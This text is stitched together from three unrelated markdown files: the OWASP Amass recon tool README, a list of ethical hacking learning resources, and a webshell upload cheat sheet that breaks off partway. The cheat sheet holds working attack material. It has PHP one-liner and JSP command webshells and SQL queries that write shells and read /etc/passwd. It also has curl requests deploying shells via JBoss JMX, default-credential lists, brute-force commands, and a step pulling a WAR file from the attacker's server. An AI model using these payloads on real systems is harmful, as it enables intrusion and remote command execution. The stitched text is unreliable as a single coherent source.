# [![OWASP Logo](https://github.com/OWASP/Amass/blob/master/images/owasp_logo.png) OWASP Amass](https://www.owasp.org/index.php/OWASP_Amass_Project) [![CircleCI Status](https://circleci.com/gh/OWASP/Amass/tree/master.svg?style=shield)](https://circleci.com/gh/OWASP/Amass/tree/master) [![GitHub release](https://img.shields.io/github/release/OWASP/Amass)](https://github.com/OWASP/Amass/releases) [![Go Version](https://img.shields.io/badge/go-1.13-blue.svg)](https://golang.org/dl/) [![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0) [![Bugcrowd LevelUp 0x04](https://img.shields.io/badge/Bugcrowd-LevelUp%200x04-orange.svg)](https://www.youtube.com/watch?v=C-GabM2db9A) [![DEF CON 27 Demo Labs](https://img.shields.io/badge/DEF%20CON%2027-Demo%20Labs-purple.svg)](https://www.defcon.org/html/defcon-27/dc-27-demolabs.html) [![DEF CON 27 Recon Village](https://img.shields.io/badge/DEF%20CON%2027-Recon%20Village-red.svg)](https://reconvillage.org/) ---- <p align="center"> <img alt="DNS Enumeration" src="https://github.com/OWASP/Amass/blob/master/images/amass.gif" width="577" height="685" /> </p> ---- The OWASP Amass Project has developed a tool to help information security professionals perform network mapping of attack surfaces and perform external asset discovery using open source information gathering and active reconnaissance techniques. **Information Gathering Techniques Used:** * **DNS:** Basic enumeration, Brute forcing (upon request), Reverse DNS sweeping, Subdomain name alterations/permutations, Zone transfers (upon request) * **Scraping:** Ask, Baidu, Bing, DNSDumpster, DNSTable, Dogpile, Exalead, Google, HackerOne, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ViewDNS, Yahoo * **Certificates:** Active pulls (upon request), Censys, CertSpotter, Crtsh, Entrust, GoogleCT * **APIs:** AlienVault, BinaryEdge, BufferOver, CIRCL, CommonCrawl, DNSDB, HackerTarget, Mnemonic, NetworksDB, PassiveTotal, RADb, Robtex, SecurityTrails, ShadowServer, Shodan, Spyse (CertDB & FindSubdomains), Sublist3rAPI, TeamCymru, ThreatCrowd, Twitter, Umbrella, URLScan, VirusTotal * **Web Archives:** ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback ---- ## Documentation Use the [Installation Guide](https://github.com/OWASP/Amass/blob/master/doc/install.md) to get started. Go to the [User's Guide](https://github.com/OWASP/Amass/blob/master/doc/user_guide.md) for additional information. ## Community [![Contribute Yes](https://img.shields.io/badge/contribute-yes-brightgreen.svg)](https://github.com/OWASP/Amass/blob/master/CONTRIBUTING.md) [![Chat on Discord](https://img.shields.io/discord/433729817918308352.svg?logo=discord)](https://discord.gg/rtN8GMd) [![Follow on Twitter](https://img.shields.io/twitter/follow/owaspamass.svg?logo=twitter)](https://twitter.com/owaspamass) ### Project Leader [![Follow on Twitter](https://img.shields.io/twitter/follow/jeff_foley.svg?logo=twitter)](https://twitter.com/jeff_foley) * OWASP: [Caffix](https://www.owasp.org/index.php/User:Caffix) * GitHub: [@caffix](https://github.com/caffix) ### Contributors This project improves thanks to all the people who contribute: [![Follow on Twitter](https://img.shields.io/twitter/follow/emtunc.svg?logo=twitter)](https://twitter.com/emtunc) [![Follow on Twitter](https://img.shields.io/twitter/follow/kalbasit.svg?logo=twitter)](https://twitter.com/kalbasit) [![Follow on Twitter](https://img.shields.io/twitter/follow/fork_while_fork.svg?logo=twitter)](https://twitter.com/fork_while_fork) [![Follow on Twitter](https://img.shields.io/twitter/follow/rbadguy1.svg?logo=twitter)](https://twitter.com/rbadguy1) [![Follow on Twitter](https://img.shields.io/twitter/follow/danjomart.svg?logo=twitter)](https://twitter.com/danjomart) [![Follow on Twitter](https://img.shields.io/twitter/follow/shane_ditton.svg?logo=twitter)](https://twitter.com/shane_ditton) [![Follow on Twitter](https://img.shields.io/twitter/follow/dhauenstein.svg?logo=twitter)](https://twitter.com/dhauenstein) [![Follow on Twitter](https://img.shields.io/twitter/follow/THB_STX.svg?logo=twitter)](https://twitter.com/THB_STX) [![Email NanoDano](https://img.shields.io/badge/NanoDano-nanodano%40devdungeon.com-blue.svg)](mailto:[email protected]) [![Follow on Twitter](https://img.shields.io/twitter/follow/DanielMiessler.svg?logo=twitter)](https://twitter.com/DanielMiessler) [![Follow on Twitter](https://img.shields.io/twitter/follow/ngkogkos.svg?logo=twitter)](https://github.com/ngkogkos) [![Follow on Twitter](https://img.shields.io/twitter/follow/Jhaddix.svg?logo=twitter)](https://twitter.com/Jhaddix) [![Follow on Twitter](https://img.shields.io/twitter/follow/Vltraheaven.svg?logo=twitter)](https://twitter.com/Vltraheaven) ## Mentions [![Rawsec's CyberSecurity Inventory](https://inventory.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.rawsec.ml/) * [Red Team Methodology - A Naked Look](https://www.slideshare.net/JasonLang1/red-team-methodology-a-naked-look-169879355) * [Asset Enumeration: Expanding a Target's Attack Surface](https://captmeelo.com/bugbounty/2019/09/02/asset-enumeration.html) * [Das Sicherheitswerkzeug Kali Linux steht in der Version 2019.3 bereit](https://www.heise.de/security/meldung/Das-Sicherheitswerkzeug-Kali-Linux-steht-in-der-Version-2019-3-bereit-4512459.html) * [Commando VM 2.0: Customization, Containers, and Kali, Oh My!](https://www.fireeye.com/blog/threat-research/2019/08/commando-vm-customization-containers-kali.html) * [8 Free Tools to Be Showcased at Black Hat and DEF CON](https://www.darkreading.com/application-security/8-free-tools-to-be-showcased-at-black-hat-and-def-con/d/d-id/1335356?image_number=5) * [amass — Automated Attack Surface Mapping](https://danielmiessler.com/study/amass/) * [Aquatone — A Tool for Domain Flyovers](https://github.com/michenriksen/aquatone) * [Collaborating with the Crowd – Recapping LevelUp 0X04](https://www.bugcrowd.com/blog/recapping_levelup_0x04/) * [Subdomain Enumeration: 2019 Workflow](https://0xpatrik.com/subdomain-enumeration-2019/) * [REMOTE CODE EXECUTION ! 😜 Recon Wins](https://medium.com/@vishnu0002/remote-code-execution-recon-wins-e9c1db79f3da) * [Where You’ll Find Us: An Overview of SecurityTrails Integrations](https://securitytrails.com/blog/integrations-overview) * [Web tools, or where to start a pentester?](https://habr.com/en/company/dsec/blog/452836/) * [Tool for detailed DNS enumeration and creation of network infrastructure maps](https://www.gurudelainformatica.es/2019/05/herramienta-para-enumeracion-detallada.html) * [Top 7 Subdomain Scanner Tools: Find Subdomains in Seconds](https://securitytrails.com/blog/subdomain-scanner-find-subdomains) * [Cyber Talent Gap: How to Do More With Less](https://www.digitalshadows.com/blog-and-research/cyber-talent-gap-how-to-do-more-with-less/) * [My Recon Process — DNS Enumeration](https://medium.com/@noobhax/my-recon-process-dns-enumeration-d0e288f81a8a) * [Week in OSINT #2019–16: From OSINT for pentesting, to OCR and OWASP](https://medium.com/week-in-osint/week-in-osint-2019-16-8ccfe0da1a70) * [Stop Using Python for Subdomain Enumeration](http://sec.alexflor.es/post/subdomain_enum/) * [My Personal OSINT Techniques, Part 1 of 2: Key & Layer, Contingency Seeding](https://0x00sec.org/t/my-personal-osint-techniques-part-1-of-2-key-layer-contingency-seeding/) * [Subdomain Enumeration Tools – 2019 Update](https://www.yeahhub.com/subdomain-enumeration-tools-2019-update/) * [Leaked Salesforce API access token at IDEA.com](https://medium.com/@jonathanbouman/leaked-salesforce-api-access-token-at-ikea-com-132eea3844e0) * [Week in OSINT #2019–11: This time a collection of mostly tools and sites](https://medium.com/week-in-osint/week-in-osint-2019-11-62774ffe7a2) * [Bug Hunting Methodology (part-1)](https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066) * [100 ways to discover (part 1)](https://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/) * [Pose a Threat: How Perceptual Analysis Helps Bug Hunters](https://www.bishopfox.com/news/2018/12/appsec-california-pose-a-threat-how-perpetual-analysis-helps-bug-hunters/) * [A penetration tester’s guide to subdomain enumeration](https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6) * [Abusing access control on a large online e-commerce site to register as supplier](https://medium.com/@fbotes2/governit-754becf85cbc) * [Black Hat Training, Making the Cloud Rain Shells!: Discovery and Recon](https://www.blackhat.com/eu-18/training/schedule/index.html#aws--azure-exploitation-making-the-cloud-rain-shells-11060) * [Subdomains Enumeration Cheat Sheet](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html) * [Search subdomains and build graphs of network structure with Amass](https://miloserdov.org/?p=2309) * [Getting started in Bug Bounty](https://medium.com/@ehsahil/getting-started-in-bug-bounty-7052da28445a) * [Source code disclosure via exposed .git folder](https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html) * [Amass, the best application to search for subdomains](https://www.h1rd.com/hacking/amass-para-buscar-subdominios) * [Subdomain Takeover: Finding Candidates](https://0xpatrik.com/subdomain-takeover-candidates/) * [Paul's Security Weekly #564: Technical Segment - Bug Bounty Hunting](https://wiki.securityweekly.com/Episode564) * [The Bug Hunters Methodology v3(ish)](https://www.youtube.com/watch?v=Qw1nNPiH_Go) * [Doing Recon the Correct Way](https://enciphers.com/doing-recon-the-correct-way/) * [Discovering subdomains](https://www.sjoerdlangkemper.nl/2018/06/20/discovering-subdomains/) * [Asset Discovery: Doing Reconnaissance the Hard Way](https://0xpatrik.com/asset-discovery/) * [Project Sonar: An Underrated Source of Internet-wide Data](https://0xpatrik.com/project-sonar-guide/) * [Top Five Ways the Red Team breached the External Perimeter](https://medium.com/@adam.toscher/top-five-ways-the-red-team-breached-the-external-perimeter-262f99dc9d17) ## Stargazers over Time [![Stargazers over Time](https://starcharts.herokuapp.com/OWASP/Amass.svg)](https://starcharts.herokuapp.com/OWASP/Amass)
# Awesome Resources For Learning Ethical Hacking & Pentesting ![Awesome Hacking](https://img.shields.io/badge/awesome-hacking-red.svg) ![Awesome community](https://img.shields.io/badge/awesome-community-green.svg) What I’m sharing here is a collection of some best resources about Hacking & Penetration Testing to make you learn faster! Let's make it the best resource repository for our community. **You are welcome to fork and contribute.** **Also you can find my own writeups/tutorials on medium : @hussnainfareed :)** ## Books 1. The Hacker Playbook 2: Practical Guide To Penetration Testing 2. The Basics of Hacking and Penetration Testing, Second Edition: Ethical Hacking and Penetration Testing Made Easy 3. Breaking into Information Security: Learning the Ropes 101 4. Penetration Testing: A Hands-On Introduction to Hacking 5. Social Engineering: The Art of Human Hacking 6. Hacking: The Art of Exploitation, 2nd Edition 7. Web Hacking 101 8. OWASP Testing Guide (A must read for web application developers and penetration testers) 9. The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 10. The Basics of Web Hacking: Tools and Techniques to Attack the Web ## Learning Platforms to Sharpen Your Skills ### Online Name | Description ---- | ---- [CTF Hacker101](https://ctf.hacker101.com/) | The Hacker101 CTF is a game designed to let you learn to hack in a safe, rewarding environment. Hacker101 is a free educational site for hackers. [Hack The Box :: Penetration Testing Labs](https://www.hackthebox.eu) | An online platform to test and advance your skills in penetration testing and cyber security. Join today and start training in our online labs. [TryHackMe](https://tryhackme.com) | TryHackMe is an online platform that teaches cyber security through short, gamified real-world labs. [CTF365](https://ctf365.com/) | An account based ctf site, awarded by Kaspersky, MIT, T-Mobile. [Backdoor](https://backdoor.sdslabs.co) | Pen testing labs that have a space for beginners, a practice arena and various competitions, account required. [Hack.me](https://hack.me/) | Lets you build/host/attack vulnerable web apps. [CTFLearn](https://ctflearn.com/) | An account-based ctf site, where users can go in and solve a range of challenges. [OWASP Vulnerable Web Applications Directory Project (Online)](https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps) | List of online available vulnerable applications for learning purposes. [Pentestit labs](https://lab.pentestit.ru) | Hands-on Pentesting Labs (OSCP style) [Root-me.org](https://www.root-me.org) | Hundreds of challenges are available to train yourself in different and not simulated environments [Vulnhub.com](https://www.vulnhub.com) | Vulnerable By Design VMs for practical 'hands-on' experience in digital security [Windows / Linux Local Privilege Escalation Workshop](https://github.com/sagishahar/lpeworkshop) | Practice your Linux and Windows privilege escalation. [Hacking Articles](http://www.hackingarticles.in/ctf-challenges1/) | CTF Breif Write up collection with a lot of screenshots good for beggainers. [Rafay Hacking Articles, a great blog](http://www.rafayhackingarticles.net/) | Write up collections by Rafay Baloch. [PentesterLab](https://pentesterlab.com/) | 20$ signature, complete content basic to write exploits, web, android. [CyberSec WTF](https://cybersecurity.wtf/)| Emulated web pentesting challenges from bounty write-ups ### Off-Line Name | Description ---- | ---- [Damn Vulnerable Xebia Training Environment](https://github.com/davevs/dvxte) | Docker Container including several vurnerable web applications (DVWA,DVWServices, DVWSockets, WebGoat, Juiceshop, Railsgoat, django.NV, Buggy Bank, Mutilidae II and more) [OWASP Vulnerable Web Applications Directory Project (Offline)](https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=Off-Line_apps) | List of offline available vulnerable applications for learning purposes ## Vulnerable Machines/Websites 1. [FiringRange](https://public-firing-range.appspot.com/) ## Vulnerability Databases And Resources Vulnerability Databases are the first place to start your day as a security professional. Any new vulnerability detection is generally available through the public vulnerability databases. These databases are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability. * http://www.exploit-db.com/ * http://1337day.com/ * http://securityvulns.com/ * http://www.securityfocus.com/ * http://www.osvdb.org/ * http://www.securiteam.com/ * http://secunia.com/advisories/ * http://insecure.org/sploits_all.html * http://zerodayinitiative.com/advisories/published/ * http://nmrc.org/pub/index.html * http://web.nvd.nist.gov * http://www.vupen.com/english/security-advisories/ * http://www.vupen.com/blog/ * http://cvedetails.com/ * http://www.rapid7.com/vulndb/index.jsp * http://oval.mitre.org/ * http://sploitus.com/ * http://cxsecurity.com/ ### Malware Analysis Name | Description ---- | ---- [Malware traffic analysis](http://www.malware-traffic-analysis.net/) | list of traffic analysis exercises [Malware Analysis - CSCI 4976](https://github.com/RPISEC/Malware/blob/master/README.md) | another class from the folks at RPISEC, quality content [Bad Binaries] (https://www.badbinaries.com/) | walkthrough documents of malware traffic analysis exercises and some occasional malware analysis. ### Linux Penetration Testing OS Name | Description ---- | ----- [Kali](http://kali.org/) | the infamous pentesting distro from the folks at Offensive Security [Parrot ](https://www.parrotsec.org/) | Debian includes full portable lab for security, DFIR, and development [Android Tamer](https://androidtamer.com//) | Android Tamer is a Virtual / Live Platform for Android Security professionals. [BlackArch](https://blackarch.org/index.html) | Arch Linux based pentesting distro, compatible with Arch installs [LionSec Linux](https://lionsec-linux.org/) | pentesting OS based on Ubuntu ## Courses 1. [Computer Systems Security, MIT](http://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-858-computer-systems-security-fall-2014/video-lectures/) 2. [cisco's cources](https://www.netacad.com/courses/cybersecurity) 3.[cybrary](https://www.cybrary.it/catalog/cybersecurity/) 4.[hackers academy](https://hackersacademy.com/) For those who want to do CEH, the following links are for you. 2. [CBT Nuggets CEH Training](http://goo.gl/JuW85U) 3. [CEH Books](https://goo.gl/gjCBLK) 4. [Guide to Binary Exploitation](https://github.com/r0hi7/binexp) ## Workshops/Playlists 1. [Web Hacking](https://www.youtube.com/playlist?list=PLJM73L2pQRd4lXBZjsHAmeEqsn5pENXxN) 2. [Ethical Hacking, A Comprehensive Playlist covering almost everything](https://www.youtube.com/playlist?list=PLkRo97mCIn9lgvE7AskNsmwJVOlJX2zaI) ## Security Talks and Conferences 1. [InfoCon - Hacking Conference Archive](https://infocon.org/cons/) 2. [Curated list of Security Talks and Videos](https://github.com/PaulSec/awesome-sec-talks) 3. [Blackhat](https://www.youtube.com/user/BlackHatOfficialYT) 4. [Defcon](https://www.youtube.com/user/DEFCONConference) 5. [Security Tube](http://www.securitytube.net/) 6. [Kevin Mitnick: Live Hack at CeBIT](https://www.youtube.com/watch?v=Q7G3kKRdUl4) 7. [Ghost in the Cloud, Kevin Mitnick](https://www.youtube.com/watch?v=76yrWGzScgI) 8. [Kevin Mitnick | Talks at Google](https://www.youtube.com/watch?v=aUqes9QdLQ4) 9. [Complete Free Hacking Course: Go from Beginner to Expert Hacker Today](https://www.youtube.com/watch?v=7nF2BAfWUEg) ## YouTube Channels Now let’s get Towards YouTube Channel Links... These Channels are Shared By Hackers where They Upload their Video POCs.. Watching them u can actually understand how to demonstrate these type of attacks... 1. [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) 2. [Black Hat](https://www.youtube.com/channel/UCJ6q9Ie29ajGqKApbLqfBOg) 3. [Injector Pca](https://www.youtube.com/channel/UCRFG_j0cgLWtJOG6fl_-rxQ) 4. [Hisham Mir](https://www.youtube.com/channel/UCYTK8lk8oLLaA330rqd0qgA) 5. [Devil Killer](https://www.youtube.com/channel/UCwfYw-C2xqemqrXq0IKF_Mg) 6. [Suleman Malik](https://www.youtube.com/channel/UC59IHQcCmgNw4GIvsXeLnDQ) 7. [Dem0n](https://www.youtube.com/channel/UC_jNs1biBixcQeSUoJxvNLw) 8. [Frans Rosén](https://www.youtube.com/channel/UCV89UhUtxqwP0j4o9tMipsA) 9. [HackerOne](https://www.youtube.com/channel/UCsgzmECky2Q9lQMWzDwMhYw) 10. [ak1t4 machine](https://www.youtube.com/channel/UCaftcKRiJJW0AJHmR1E5MAQ) 11. [Shawar Khan](https://www.youtube.com/channel/UCPxJLZCoIRJHs1VebWeaByA) 12. [vulnerability0lab](https://www.youtube.com/channel/UC4QJ7X4nnkAYXsnFQpdytcA) 13. [Bugcrowd](https://www.youtube.com/channel/UCo1NHk_bgbAbDBc4JinrXww) 14. [Vijay Kumar](https://www.youtube.com/channel/UCs2NmJGRecw_huNzvQNf2_A) 15. [Web Development Tutorials](https://www.youtube.com/channel/UCS0y5e-AMsZO8GEFtKBAzkA) 16. [Jan Wikholm](https://www.youtube.com/channel/UCOQtLXVJduZ4-YUFOi5EzIA) 17. [Bhargav Tandel](https://www.youtube.com/channel/UCh5MTJLt3LYr_rkwcOQJNWg) 18. [ErrOr SquaD](https://www.youtube.com/channel/UCou-7r8Mk4oQcBmazxp5uwg) 19. [SecurityIdiots](https://www.youtube.com/channel/UCPPAYs04kwfXcHnerm_ueFw) 20. [Penetration Testing in Linux](https://www.youtube.com/channel/UC286ntgASMskhPIJQebJVvA) 21. [Hussnain Fareed](https://www.youtube.com/channel/UCbq5fgcqUz-PlMs3RCOUrXw) 22. [Null Byte](https://www.youtube.com/channel/UCgTNupxATBfWmfehv21ym-g) 23. [ZAID](https://www.youtube.com/user/zaidsabeeh) 24. [vabs tutorial](https://www.youtube.com/channel/UCa0wCQEB8CRKzjJV2GZ_EzA) 25. [the cyber mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) 26. [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A) 27. [GetCyber](https://www.youtube.com/@GetCyber/videos) Any Channel Link Missing? Kindly add it in Comments ### Forums Name | Description ---- | ---- [0x00sec](https://0x00sec.org/) | hacker, malware, computer engineering, Reverse engineering [Antichat](https://forum.antichat.ru/) | russian based forum [CODEBY.NET](https://codeby.net/) | hacker, WAPT, malware, computer engineering, Reverse engineering, forensics - russian based forum [EAST Exploit database](http://eastexploits.com/) | exploit DB for commercial exploits written for EAST Pentest Framework [Greysec](https://greysec.net) | hacking and security forum [Hackforums](https://hackforums.net/) | posting webstite for hacks/exploits/various discussion ### Contribution Your contributions and suggestions are heartily welcome. # NOTE: All references taken from Internet and shared on internet xD Thanks to those who shared their opinion before that helped me learn 😉 if you have any questions, please ask in the comments. If you know about any good resource for beginners, please share it here. For more articles on hacking you can follow me on Medium: ## medium.com/@hussnainfareed
# Webshell upload techniques ### INDEX ``` I. Classic Webshell upload techniques ➤ Technique 1. Webshell upload using a PHPMyAdmin Web console ➤ Technique 2. Webshell upload using an Apache Tomcat manager Web console ➤ Technique 3. Webshell upload using a JBoss administration JMX console ➤ Technique 4. Webshell upload using a WebLogic administration console ➤ Technique 5. Webshell upload using a CMS Website admin console (e.g., WordPress) ➤ Technique 6. Webshell upload by exploiting an insecure (writable) file share (FTP/CIFS/SAMBA/NFS) of a Web server (i.e., C:\inetpub\wwwroot\ or /var/www/) ➤ Technique 7. Webshell upload by abusing the insecure HTTP PUT method ➤ Technique 8. Webshell upload by exploiting a vulnerable file upload function ➤ Technique 9. Webshell upload by exploiting a remote file include (RFI) vulnerability ➤ Technique 10. Webshell upload by exploiting a local file include (LFI) vulnerability ➤ Technique 11. Webshell upload by exploiting a SQL injection (SQLi) vulnerability ➤ Technique 12. Webshell upload by exploiting a remote OS command execution vulnerability ➤ Technique 13. Webshell upload by exploiting a remote code execution (RCE) vulnerability (e.g. insecure deserialization, ) ➤ Technique 14. Webshell upload by exploiting an insecure CKEditor (WYSIWYG HTML Editor with Collaborative Rich Text Editing) ➤ Technique 15. Webshell upload using a Lotus Domino admin console ➤ Technique 16. Webshell upload using a Splunk administration console ➤ Technique 17. Webshell upload using a Jenkins admin console ➤ Technique 18. ... II. List of common paths for the DocumentRoot directory (Web root folder) III. Usefull Github links for Webshells IV. Quickly set up a test environment using Docker ``` ### I. Classic Webshell upload techniques #### Technique 1 - PHPMyAdmin Web console ``` ➤ Step 1. Log into the PHPMyAdmin Web console by exploiting the presence of default or easy guessable credentials, anonymous access or by performing a brute-force or dictionnary password attack using Burp proxy - URL: http://x.x.x.x/phpmyadmin or http://x.x.x.x/website-name/phpmyadmin) - Default or weak credentials: root:root, root and empty password ➤ Step 2. Find or guess the Web server installation path (DocumenRoot) Web root folder (e.g., it can be found thanks to "http://x.x.x.x/<path>/phpinfo.php"). - Example for Windows - XAMP = 'C:\XAMPP\htdocs\' or 'C:\XAMPP\htdocs\<website-name>\' - Example for Linux - LAMP = '/var/www/' or '/var/www/https/<website-name>/wp-content/uploads/', etc ... ➤ Step 3. In the PHPMyAdmin Web console, go to the SQL query browser then: - Type and execute the following SQL query to display OS files (it depends of the right of the account running the PHPMyAdmin console) + Linux server - "SELECT LOAD_FILE('/etc/passwd');" + Windows server - "SELECT LOAD_FILE('C:\Windows\system.ini');" - Type and execute the following SQL query to write a PHP Webshell in the Web root folder + Linux server - "select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/b<website-name>/wp-content/uploads/Webshell.php";" + Windows server - "select "< ? $c = $_GET['cmd']; $op = shell_exec($c); echo $op ? >" into outfile "C:\\XAMPP\\htdocs\\<website-name>\\Webshell.php";" ➤ Step 4. Access to the 'Webshell.php' file with your web browser and execute OS commands Examples: - http://x.x.x.x/<website-name>/wp-content/uploads/Webshell.php?cmd=whoami - http://x.x.x.x/<website-name>/Webshell.php?cmd=whoami Note: Several PHP functions can be used in a webshell to execute OS commands Examples: + shell_exec() function: <?php echo shell_exec($_GET['cmd']); ?> + system() function: <?php system($_GET['cmd']); ?> + passthru() function: <?php echo passthru($_GET['cmd']); ?> + exec() function: <?php echo exec($_POST['cmd']); ?> ``` #### Technique 2 - Apache Tomcat Manager Web console ``` ➤ Step 1. Log into the Tomcat manager Web console by exploiting the presence of default or easy guessable credentials, anonymous access or by performing a brute-force or dictionnary password attack using Burp proxy or Metasploit (use auxiliary/scanner/http/tomcat_mgr_login) - URL: http://x.x.x.x/:8080/manager/html or http://x.x.x.x/website-name/manager, ...) - Default or weak credentials: tomcat:tomcat, tomcat:manager, manager:manager, admin:manager, xampp:xampp, ... ➤ Step 2. Upload and deploy your WAR file (i.e. "Select WAR file to upload" and then click on the "Deploy" button) ➤ Step 3. Then go to the application section to see the details about your new deployed application (e.g. path, start/stop/reload/undeploy buttons etc.) ➤ Step 4. Execute OS commands using the Webshell - Examples: + http://target_IP:port/<path>/webshell.jsp?cmd=whoami + http://target_IP:port/webshell/webshell.jsp?cmd=whoami ``` ##### <i>Example - How to create a WAR file</i> ``` 1. Choose a Web shell (.jsp) <%@ page import="java.util.*,java.io.*"%> <% %> <HTML> <TITLE>JSP Shell</TITLE> <BODY> Note: Against Windows you may need to prefix your command with cmd.exe /c </br></br> JSP Command: <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Execute"> </FORM> <PRE> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </PRE> </BODY> </HTML> 2. Generate a WAR file with the web shell : "jar -cvf webshell.war webshell.jsp" 3. Upload the WAR file to a Web server such as Tomcat, Websphere, Weblogic, JBoss etc. ``` #### Technique 3 - JBoss Administration JMX console ``` Example 1 --------- ➤ Step 1. Log into the JBoss JMX console by exploiting the presence of default or easy guessable credentials, anonymous access or by performing a brute-force or dictionnary password attack using Burp proxy - Default or weak credentials: admin:admin, sysadmin:sysadmin, ... - Examples of URL: + https://x.x.x.x:9990/console + https://x.x.x.x:8090/jmx-console/ + https://x.x.x.x:8080/jmx-console/ + https://x.x.x.x:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo + https://x.x.x.x:8080/web-console/ServerInfo.jsp + https://x.x.x.x:8080/invoker/JMXInvokerServlet + https://x.x.x.x:8080/admin-console/ ➤ Step 2. Create a WAR file (e.g., webshell.war) with a jsp webshell and host it in a publicly available web server (python -m SimpleHTTPServer 80) ➤ Step 3. On to the JMX Console, browse the URL below and type in the ObjectName filter field "*:service=MainDeployer" then click on “service=MainDeployer” - https://x.x.x.x:8080/jmx-console/HtmlAdaptor?action=displayMBeans ➤ Step 4. Use the “void deploy()” function to deploy a WAR file - Enter the IP address of the Web server and the name of your WAR file in the URL box (in the "ParamValue" field) + example: x.x.x.x/webshell.war - Then click the “Invoke” button - The web server should display the message "Operation completed successfully with a return value" ➤ Step 5. Execute OS commands using the Webshell - Examples: + http://x.x.x.x:8080/webshell/webshell.jsp?cmd=whoami&html=true + http://x.x.x.x:9090/webshell/webshell.jsp?cmd=whoami ``` ``` Example 2 --------- ➤ Step 1. On the command line, type the following cURL request (wrapped for better readability) to deploy a WAR file using the JMX Console: $ curl ’http://x.x.x.x:8080/jmx-console/HtmlAdaptor ?action=invokeOpByName &name=jboss.admin%3Aservice%3DDeploymentFileRepository &methodName=store &argType=java.lang.String &arg0=shell.war &argType=java.lang.String &arg1=shell &argType=java.lang.String &arg2=.jsp &argType=java.lang.String &arg3=%3C%25Runtime.getRuntime%28%29.exec%28request. getParameter%28%22c%22%29%29%3B%25%3E%0A &argType=boolean &arg4=True’ ➤ Step 2. Afterwards, arbitrary commands can be run on the host system. Examples: - $ curl ’http://x.x.x.x:8080/shell/shell.jsp?c=touch%20%2ftmp%2ftest.txt’ - $ curl ’http://x.x.x.x:8080/shell/shell.jsp?c=whoami’ Other manual Webshell upload technique: https://securitysynapse.blogspot.com/2013/08/manually-exploiting-jboss-jmx-console.html ``` #### Technique 4 - Weblogic Administration console ``` ➤ Step 1. Log into the Weblogic admin console by exploiting the presence of default or easy guessable credentials, anonymous access or by performing a brute-force or dictionnary password attack using Burp proxy - URL should be something like: "http:\\<Admin_server_IP>:<AdminServerPort>/console" or "https:\\x.x.x.x:7001/console", ... - Default or weak credentials: weblogic:weblogic, weblogic/weblogic1, weblogic/welcome1, system/Passw0rd (for Weblogic Server 11g), system/password, system/weblogic, ... ➤ Step 2. From the tree-structure in the left panel, choose the Web Applications node under the Deployments node. Then, click on the Configure a new Web Application link in the left pane to begin the deployment of yout 'Webshell.war' application. ➤ Step 3. To proceed, click on the upload it through the browser link in the right panel. Use the "Browse" button to locate your war file and click the "Upload" button to upload it. ➤ Step 4. At the bottom of the right panel, you will find displayed the name of the file that was just uploaded i.e., your 'webshell.war' – preceded by a [select] link. This is a clear indicator of the success of the upload process. To complete the deployment however, you will have to associate the deployed war file with one or more WebLogic server instances as you deem necessary. To achieve this, click on the [select] hyperlink that precedes the webshell.war entry. ➤ Step 5. The Available Servers list in the right panel will list all the available WebLogic server instances. From this list, choose the instances on which the egurkha application is to be deployed. Then, click on the –> button to transfer the selection to the Target Servers list. Finally, deploy the webshell application on the Target Servers by clicking on the Configure and Deploy button ➤ Step 6. Once the deployment completes and is successful, the Deployment Status section in the right panel will display true against each of the target servers. Similarly, the Deployment Activity section will display the Completed status for each of the target servers. On the contrary, if the Deployment Status is false and the Deployment Activity is “Running…”, it indicates that deployment is ‘in progress’. In such a case, wait until the status changes. ➤ Step 7. Execute OS commands using the Webshell - Example: http://target_IP/<path>/webshell.jsp?cmd=whoami ``` #### Technique 5 - Webshell upload by abusing a CMS Website admin console protected by a weak administrator password ##### <i>If you have admin privileges over a CMS such as WordPress, Kentico, DotNetNuke, Drupal, Joomla [...] then you can upload a webshell and execute OS commands.</i> ``` Example 1 - WorPress --------------------- ➤ Step 1. Enumerate WordPress users or Guess the Wordpress admin's login - root@kali:~/# wpscan --url http://x.x.x.x.x --enumerate p,u,t,tt) ➤ Step 2. Perform a bruteforce or dictionnary password attack - root@kali:~/# wpscan --url http://x.x.x.x.x --wp-content-dir /wp-login.php --wordlist /root/Desktop/<path>/wordlist.dic --username admin ➤ Step 3. Log into the WorPress admin console URL examples: - http://x.x.x.x/wp-login.php - http://x.x.x.x/wp-admin - http://x.x.x.x/admin - http://x.x.x.x/login ➤ Step 4. Upload of a Webshell - Method 1 - Add a PHP webshell by editing a theme php page and adding the code of a PHP webshell (e.g. 404 error page) Go to 'Apparances' and then 'Editor' to edit a PHP page with a webshell or a reverseshell - Method 2 - Upload of a PHP webshell by using the WordPress plugin upload page Examples: + Go to 'https://website/wordpress-blog/wp-admin/plugin-install.php?tab=upload' + Then upload a PHP webshell (and not a zip file) + Finally browse the webshell and execute OS commands > 